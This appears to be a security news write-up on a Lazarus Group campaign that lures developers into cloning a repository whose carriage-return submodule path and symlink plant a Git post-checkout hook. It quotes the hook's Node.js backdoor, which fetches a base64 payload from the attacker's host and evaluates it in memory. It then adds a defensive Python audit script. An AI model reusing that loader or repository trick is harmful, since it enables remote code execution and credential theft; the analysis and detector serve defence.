Early this month, cybersecurity researchers uncovered a novel phishing campaign attributed to the Lazarus Group that targets developers and crypto professionals through a cleverly crafted Git symlink vulnerability.
Rather than relying solely on traditional malware distribution channels, the attackers have weaponized the way Git resolves repository paths, using a symbolic link to plant a malicious hook inside the repository's own hooks directory so that it runs during routine operations.
This technique allows the attackers to maintain a low profile while compromising high-value targets who assume that their development workflows are immune to social engineering.
The initial lure begins with personalized messages on professional networking platforms, where prospective victims are invited to participate in a mock technical interview.
The conversation is structured to gain the victim’s confidence and coax them into running a single Git clone command.
The repository contains a nested directory named api/db_drivers that is actually a symbolic link pointing back into the repository's own .git modules directory. Because of this structure, a checkout writes the attacker's hook script into a hooks directory and then runs it, with no action from the victim beyond the clone itself.
KuCoin analysts noted the first instances of this attack vector in late August, following reports of compromised private GitLab repositories.
Detailed analysis revealed that the symlink exploit leverages Git’s post-checkout hook mechanism to initiate a hidden backdoor.
By delivering a malicious post-checkout script through the symbolic link, the attackers achieve code execution without modifying the main codebase, so the hook is invisible to integrity checks and static scanners that only look at the checked-out source.
Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a remote command-and-control server, siphoning credentials, system information, and wallet data back to the threat actors.
The exploit's sophistication lies in its seamless integration with legitimate workflows. Victims report that the malicious hook is triggered automatically after executing the following (the credential and host portion of the clone URL is obfuscated in the source):
git clone --recursive https://guest:[email protected]/product/delivery.git
cd product/delivery
The embedded script, hooks/post-checkout, invokes a Node.js backdoor:
const vm = require('vm');
const https = require('https');
// Fetch a JSON document from the attacker's GitLab host; the API-style path blends in with normal traffic.
https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
  let data = "";
  res.on('data', chunk => data += chunk);
  // The "payload" field is base64-encoded JavaScript. vm.runInNewContext stringifies the Buffer
  // and evaluates it in memory, so the second stage never touches disk.
  res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
});
Once deployed, this backdoor maintains persistence by cleaning and replacing project files to remove obvious signs of tampering, ensuring that developers see only the expected code.
Infection Mechanism Deep Dive
The infection unfolds in two coordinated phases: exploitation of Git's path handling and stealthy hook execution.
First, the attackers declare a submodule whose path is api/db_drivers^M, that is, api/db_drivers with a trailing carriage return. Git strips that carriage return when it reads the value back from its configuration, so the submodule is checked out to api/db_drivers rather than to the name recorded in the tree. The tree ships api/db_drivers as a symbolic link into the submodule's own hooks directory, .git/modules/api/db_drivers/hooks/, so the checkout writes the submodule's files, including the post-checkout script, into that hooks directory, and Git then runs the hook as part of completing the checkout. Cloning with --no-checkout and inspecting the tree (git ls-tree -r) for symbolic links that resolve into .git and for paths containing control characters exposes the structure before any hook can run.
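The script below is an example added for this page, not KuCoin's tooling or code from the campaign. It implements the pre-checkout inspection described above, and also covers the repository layout sketched earlier in the article: it parses the tree listing of a --no-checkout clone and the raw .gitmodules file, then flags symbolic links that resolve into .git, tree paths and submodule paths that contain control characters, and gitlinks whose carriage-return-stripped path collides with another tree entry. The tree listing, blob contents, object ids and URL are constructed stand-ins for what git ls-tree -r -z HEAD, git cat-file -p and git show HEAD:.gitmodules return; the exact layout assumed for the malicious repository (a symbolic link at the carriage-return-free path, a gitlink at the name with the trailing carriage return) follows the description above and is an assumption.

```python
"""Pre-checkout audit for the carriage-return submodule path / symlink-into-.git hooks
trick. Example added for this page; every sample input below is constructed."""
import re
from pathlib import PurePosixPath

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
OID_MODULES, OID_README, OID_LINK, OID_SUB, OID_DOC = ("1" * 40, "2" * 40, "3" * 40, "4" * 40, "5" * 40)


def _rec(mode, typ, oid, path):
    # One `git ls-tree -r -z` record; -z keeps raw path bytes instead of C-quoting the CR.
    return f"{mode} {typ} {oid}\t{path}\0".encode()


# Constructed malicious tree: a symlink at api/db_drivers plus a gitlink whose
# path is the same name with a trailing CR, matching the .gitmodules entry.
MALICIOUS_TREE = (
    _rec("100644", "blob", OID_MODULES, ".gitmodules")
    + _rec("100644", "blob", OID_README, "README.md")
    + _rec("120000", "blob", OID_LINK, "api/db_drivers")
    + _rec("160000", "commit", OID_SUB, "api/db_drivers\r")
)
MALICIOUS_BLOBS = {OID_LINK: b"../.git/modules/api/db_drivers/hooks"}  # symlink target as cat-file -p shows it
MALICIOUS_GITMODULES = (
    b'[submodule "api/db_drivers"]\n'
    b"\tpath = api/db_drivers\r\n"
    b"\turl = https://example.invalid/product/db_drivers.git\n"  # placeholder URL
)
# Constructed benign tree with an ordinary relative symlink.
CLEAN_TREE = _rec("100644", "blob", OID_README, "README.md") + _rec("120000", "blob", OID_DOC, "docs/latest")
CLEAN_BLOBS = {OID_DOC: b"v2"}


def parse_ls_tree_z(data):
    """Parse NUL-terminated `git ls-tree -r -z` output into (mode, type, oid, path)."""
    entries = []
    for record in data.split(b"\0"):
        if record:
            meta, path = record.split(b"\t", 1)
            mode, typ, oid = meta.decode().split(" ")
            entries.append((mode, typ, oid, path.decode("utf-8", "surrogateescape")))
    return entries


def parse_gitmodules_raw(text):
    """Read .gitmodules byte for byte: `git config` would strip the trailing CR, which
    is exactly the discrepancy the attack relies on, so it is not used here."""
    modules, current = {}, None
    for line in text.split(b"\n"):
        stripped = line.strip(b" \t")
        if stripped.startswith(b'[submodule "'):
            current = stripped[len(b'[submodule "'):-2].decode()
            modules[current] = {}
        elif current is not None and b"=" in stripped:
            key, value = stripped.split(b"=", 1)
            modules[current][key.strip().decode()] = value.lstrip(b" \t").decode("utf-8", "surrogateescape")
    return modules


def _normalize(parts):
    """Collapse '.' and '..' lexically; a leading '..' is kept so a worktree escape stays visible."""
    out = []
    for part in (p for p in parts if p not in ("", ".")):
        if part == ".." and out and out[-1] != "..":
            out.pop()
        else:
            out.append(part)
    return out


def symlink_target_suspicious(link_path, target):
    """Resolve a link target relative to the link's directory; return the reason it is
    dangerous or None. A '.git' component also covers .git/modules/<name>/hooks."""
    if target.startswith("/"):
        return "absolute target"
    resolved = _normalize(list(PurePosixPath(link_path).parent.parts) + target.split("/"))
    if resolved and resolved[0] == "..":
        return "target escapes the worktree"
    if ".git" in resolved:
        return "target points into the .git directory"
    return None


def audit(ls_tree_z, blobs, gitmodules):
    """Return findings for one repository; an empty list means the pattern was not seen."""
    findings = []
    entries = parse_ls_tree_z(ls_tree_z)
    modes = {path: mode for mode, _, _, path in entries}
    for mode, _, oid, path in entries:
        if CONTROL.search(path):
            findings.append(f"control character in tree path {path!r}")
        if mode == "120000":  # symlink: the blob holds the target
            reason = symlink_target_suspicious(path, blobs[oid].decode())
            if reason:
                findings.append(f"symlink {path!r} -> {blobs[oid].decode()!r}: {reason}")
        if mode == "160000":  # gitlink: Git would check the submodule out at the CR-stripped path
            checkout_path = path.rstrip("\r\n")
            if checkout_path != path and checkout_path in modes:
                kind = "symlink" if modes[checkout_path] == "120000" else "existing entry"
                findings.append(f"submodule {path!r} would be checked out over {checkout_path!r}, a {kind}")
    for name, cfg in parse_gitmodules_raw(gitmodules).items():
        sub_path = cfg.get("path", "")
        if CONTROL.search(sub_path) or sub_path.startswith("/") or ".." in sub_path.split("/"):
            findings.append(f".gitmodules submodule {name!r} declares unsafe path {sub_path!r}")
    return findings
```

On a real repository, run git clone --no-checkout URL (which also skips submodule initialization), then feed audit() the bytes of git ls-tree -r -z HEAD, a dictionary mapping each symlink blob id to its git cat-file -p output, and git show HEAD:.gitmodules. Any non-empty result is reason not to proceed to git checkout or git submodule update. For the constructed malicious sample the function returns four findings (the symlink into .git, the control character in the gitlink path, the submodule landing on the symlink, and the unsafe .gitmodules path); for the benign sample it returns none.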
By exploiting a fundamental behavior of Git, the Lazarus Group has demonstrated a new level of technical ingenuity, blending supply chain compromise with social engineering to target high-value individuals.
The campaign serves as a stark reminder that even the most trusted development tools can be weaponized when assumptions about workflow integrity go unchallenged.